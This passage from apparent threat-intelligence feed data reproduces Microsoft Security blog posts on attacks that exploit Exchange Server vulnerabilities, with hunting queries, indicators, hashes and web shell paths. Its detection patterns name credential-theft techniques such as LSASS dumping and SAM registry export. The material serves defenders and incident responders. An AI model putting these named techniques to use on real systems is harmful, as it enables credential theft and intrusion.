might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T21:21:07", "type": "mmpc", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MMPC:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:28:51", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious 